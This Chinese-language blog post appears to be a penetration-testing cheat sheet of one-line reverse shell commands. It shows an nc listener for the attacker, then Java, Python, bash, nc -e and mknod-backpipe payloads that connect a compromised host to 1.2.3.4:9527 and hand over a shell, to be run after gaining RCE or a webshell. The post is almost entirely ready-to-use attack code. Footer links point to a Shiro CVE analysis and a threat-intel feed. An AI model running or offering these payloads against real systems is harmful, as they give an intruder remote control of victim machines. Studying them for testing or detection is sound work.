各种语言的一句话反弹 shell 命令


攻击主机先监听端口

最简单的脚本可以用 nc :

nc -lvvp 9527

被攻击主机连接到服务端口

一般都需要通过 RCE、 webshell 等方式在被攻击机执行以下命令,具体怎么做就要看水平了:

JAVA

Runtime.getRuntime().exec(["/bin/bash","-c","exec 5<>/dev/tcp/1.2.3.4/9527;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); 

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("1.2.3.4",9527));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

bash

bash -i >& /dev/tcp/1.2.3.4/9527 0>&1

nc

nc -e /bin/sh 1.2.3.4 9527

mknod /tmp/backpipe p
/bin/sh 0</tmp/backpipe | nc 1.2.3.4 9527 1>/tmp/backpipe

文章作者: EXP
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 EXP !
 上一篇
CVE-2020-13933 漏洞分析 CVE-2020-13933 漏洞分析
Apache Shiro < 1.6.0 身份验证绕过漏洞: Apache Shiro 是一个强大且易用的 Java 安全框架,执行身份验证、授权、密码和会话管理,通常会和 spring 等框架一起搭配使用来开发 web 应用
2020-09-09
下一篇 
威胁情报播报 威胁情报播报
从 360、奇安信、红后、绿盟、安全客、斗象 等公开来源爬取并整合最新的威胁情报信息,并实时推送到 邮箱、订阅号、QQ 群
2020-05-01
  目录